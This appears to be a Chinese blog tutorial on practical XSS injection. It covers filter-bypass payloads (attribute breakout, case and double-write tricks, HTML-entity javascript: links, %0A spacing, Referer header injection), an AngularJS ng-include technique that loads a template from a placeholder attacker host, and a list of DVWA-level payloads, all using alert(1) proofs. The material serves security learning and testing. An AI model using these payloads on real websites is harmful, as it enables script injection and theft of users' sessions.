XSS攻击(3), 实战XSS注入思路

XSS注入, XSS实战思路

一, 可以输入文本或直接在url后面提交参数.

网页源码:

<input name=keyword value="">

对于这种input标签, 首先可以考虑使用 onclick 等事件来执行js.
先输入 <> , " , onclick() 等等提交, 查看页面源代码.
如果输入的符号没有被转义或替换, 说明前面可以闭合, 进一步测试.

1. 首先考虑用 onclick() 等事件来执行js.

查看源码:

<input name=keyword value="<>">

输入payload:

" οnclick="alert(1)

查看源码:

<input name=keyword value="" onclick="alert(1)">

这时前面的value被闭合, 后面多了一个事件, 单机文本框即可弹出.

2. 事件不能用时, 考虑用<script>标签来执行js.

如果输入的 onclick 被替换为 o_nclick 等其他字符.

查看源码:

<input name=keyword value="" o_nclick="alert(1)">

前面value虽然闭合了, 但是后面无法执行事件. 那么可能一些类似的事件都被防御了.
此时考虑将前面的input标签整体闭合掉, 后面自己再构造一个新的<script>标签执行js.

输入payload:

"/> <script>alert(1)</script>

查看源码:

<input name=keyword value=""/> <script>alert(1)</script>">

后面多出来的 "> 会作为普通字符显示, 不处理也没有关系.

3. <script>标签不能用时, 考虑用其他标签来执行js.

如果输入的

<input name=keyword value=""/> <scr_ipt>alert(1)</script>">

前面的input标签虽然闭合了, 但是后面的script标签被替换了, 无法执行js.
此时考虑使用其他标签, 比如<a>超链接.

输入payload:

"/> <a href="javascript:alert(1)">点我</a>

查看源码:

<input name=keyword value=""/> <a href="javascript:alert(1)">点我</a>">
4. 标签的属性也不能用时, 考虑使用大小写绕过.

如果输入的href属性被替换为hr_ef 等其他字符.

查看源码:

<input name=keyword value=""/> <a hr_ef="javascript:alert(1)">点我</a>">

输入payload:

" ONcLick="alert(1)

查看源码:

<input name=keyword value="" ONcLick="alert(1)">

点击输入框之后, ONcLick() 可以顺利触发事件, 执行js.

5. 大小写无法绕过时, 考虑使用双写绕过.

查看源码:

<input name=keyword value="" click="alert(1)">

这里看到防御措施将事件名替换成了click, 导致事件失效.
猜测规律是将所有的on替换为了空字符串.
那么使用双写将on分开来绕过防御.

输入payload:

" oonnclick="alert(1)

查看源码:

<input name=keyword value="" onclick="alert(1)">
6. Payload代码中的关键字无法使用时, 考虑 HTML字符实体绕过.

这里想通过<a>标签的href属性执行js.

输入payload:

javascript:alert(1)

查看源码:

<a href="javascr_ipt:alert(1)"></a>

这里javascript被替换, 考虑使用HTML字符实体绕过.
将字符串转换为字符实体可以使用在线工具, 比如:

https://www.qqxiuzi.cn/bianma/zifushiti.php

javascript:alert(1)转换为10进制或16进制都可以:

输入payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

查看源码:

<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"></a>

点击超链接可以顺利执行js.

7. 如果HTML字符实体在链接属性中无效, 考虑添加//http://或//https://.

因为字符实体时没有尖括号或引号等特殊字符, 如果放在事件属性href中可以绕过检测.
那么防御措施可能使用正则表达式来检测, 要求在链接属性中必须包含http://https://, 否则判断为非法链接.
此时我们可以采用字符实体与http相结合的方式绕过并执行js.

前半段依旧使用js代码的字符实体, 但是注意 javascript:alert(1)后面需要多添加一个分号;.
后面添加//http://, 这里使用注释符号//http://变成普通的字符串, 这样就不会影响前面需要执行的js.

javascript:alert(1);转换为10进制:

输入payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#59;//http://

查看源码:

<a html
href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#59;//http://">
</a>
8. Payload代码中的空格被替换为&nbsp; 时, 考虑用URL编码换行符 %0D, %0A绕过.

查看源码:

<center>test</center>

输入payload:

keyword=<img src=1 onerror=alert(1)/>

查看源码:

<center><img&nbsp;src=1&nbsp;οnerrοr=alert(1)&nbsp;></center>

这里发现空格被替换了, 导致事件无法触发. 接着尝试用%0A绕过.
输入payload:

keyword=<img%0Asrc=1%0Aοnerrοr=alert(1)/>
9. 失效的Flash控件.

对于失效的Flash控件, onclick() 事件无法触发, 考虑使用 onmousrover() 事件. 例如:

<embed src=xsf01.swf?a=b width=100% height=100%>

上面代码在网页中嵌入一个Adobe Flash文件. 因为在2020年底之后, 主流的浏览器已经不支持Flash文件,
所以浏览器会显示 显示该插件不受支持.

假设a与b是可控参数. 那么输入payload:

a=111&b=222 οnmοuseοver=alert(1)

当鼠标划过失效的flash控件时会触发js代码.

二, 隐藏的form表单

在页面中看不到任何可以输入的地方, 查看源码可以看到有隐藏的form表单.

<form id="search">
    <input name="link" value="" type="hidden">
    <input name="sort" value="" type="hidden">
</form>
1. 首先考虑利用value属性执行js.

从源码的form可以看出是get请求, 那么这里有两种办法提交参数测试:

方法一: 在url地址上直接拼接参数提交.
http://xxx/test.php?link=111&sort=222

接着查看源码:

<form id="search">
    <input name="link" value="" type="hidden">
    <input name="sort" value="222" type="hidden">
</form>
方法二: 打开F12工具, 修改代码, 添加一个提交按钮, 并去掉隐藏属性显示出输入框.
<form id="search">
    <input name="link" value="" type="text">
    <input name="sort" value="" type="text">
    <button>提交</button>
</form>

在输入框输入文本并提交后:

<form id="search">
    <input name="link" value="" type="hidden">
    <input name="sort" value="222" type="hidden">
</form>

那么从这里可以看出 value="222" 就是可以利用的位置.
接着使用payload测试能否执行js.
因为F12是临时修改, 这里的控件在提交之后就会还原成隐藏的, 所以后面使用一个 type="button" 属性来替换掉原来的 type="hidden", 这样控件就可以被点击触发事件了.

输入payload:

hello" οnclick="alert(1)" type="button

查看源码:

<form id="search">
    <input name="link" value="" type="hidden">
    <input name="sort" value="hello" onclick="alert(1)" type="button">
</form>
2. 如果value属性无法利用时, 考虑使用请求头注入.

在value提交注入后无效, 查看源码:

<form id="search">
    <input name="link" value="" type="hidden">
    <input name="sort" value="hello" onclick="alert(1)" type="button" type="hidden">
    <input name="ref"  value="http://xxx/text.php?ref=xxx"> 
</form>

从F12工具观察value的双引号颜色不同, 没有有效闭合, 无法执行js.
将payload提交到ref中发现也无法执行js.
猜测ref的值可能来自请求头中的Referer信息.

首先使用burpsuit或者firefoxLive HTTP headers插件拦截请求.
在请求信息中添加或修改Referer, 再发送请求.

输入payload:

Host: http://xxx/text.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: hello" οnclick="alert(1)" type="button

查看源码:

<form id="search">
    <input name="link" value="" type="hidden">
    <input name="sort" value="" type="hidden">
    <input name="ref"  value="hello" onclick="alert(1)" type="button" type="hidden"> 
</form>

那么同样的原理, 如果发现源码中 input 中存在类似 name="ua", "name=cook"等类似的命名,
也可以尝试拦截请求, 注入User-Agent, cookie 等请求头.

三, 利用 AngularJS ng-include 加载恶意模板

AngularJS 中,使用 ng-include加载内容时,该内容会被当作 AngularJS 模板处理,而不是普通的 HTML。
这意味着任何在加载的内容中的

如果在网页源码中发现引用了 angular.min.js, 代码中使用了 ng-include, 例如:

url: http://xxx/test.php?src=1.gif

查看源码:

<div ng-include="1.gif"></div>

接着测试src参数:

输入payload:

src=hello

查看源码:

<div ng-include="hello"></div>

那么可以确定这里的ng-include可以被控制.
接着准备一个包含恶意代码的Angular模板文件https://xxx.com/xss.html, 内容如下:

<div ng-init="evilConstructor = constructor.constructor; evilFunction = evilConstructor('alert(1)'); evilFunction()"></div>

通过src 参数可以加载它并触发alert(1).
输入payload:

src=https://xxx.com/xss.html

查看源码:

<div ng-include="https://xxx.com/xss.html"></div>

代码使用了 AngularJS 的双向数据绑定和 JavaScript 的 constructor 属性来创建并执行一个新的函数,
这会触发 alert(1)。

四, 常用XSS漏洞 payload
1、DOM型
(1) Low: 地址参数: <script>alert(1)</script>
(2) Medium: 报错事件 default=English</option></select><img src='x' onerror='alert(1)'>
(3) High: 锚点: default=English#<script>alert(1)</script>
    因为锚点后面的部分不会作为url提交请求, 但是可以在前端执行.
2, 反射型
(1) Low: <script>alert(1)</script>
(2) Medium: name=<scr<script>ipt>alert(1)</script># 或<Script>alert(/xss/)</script>
(3) High: <img src=l onerror=alert(1)>
3, 存储型
(1) Low: 留言内容:<script>alert(1)</script>
(2) Medium: Burp修改: <sc<script>ript>alert(/xss/)</script>,不能直接在页面上处理
(3) High: txtName参数: <img src=l onerror=alert(1)>
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值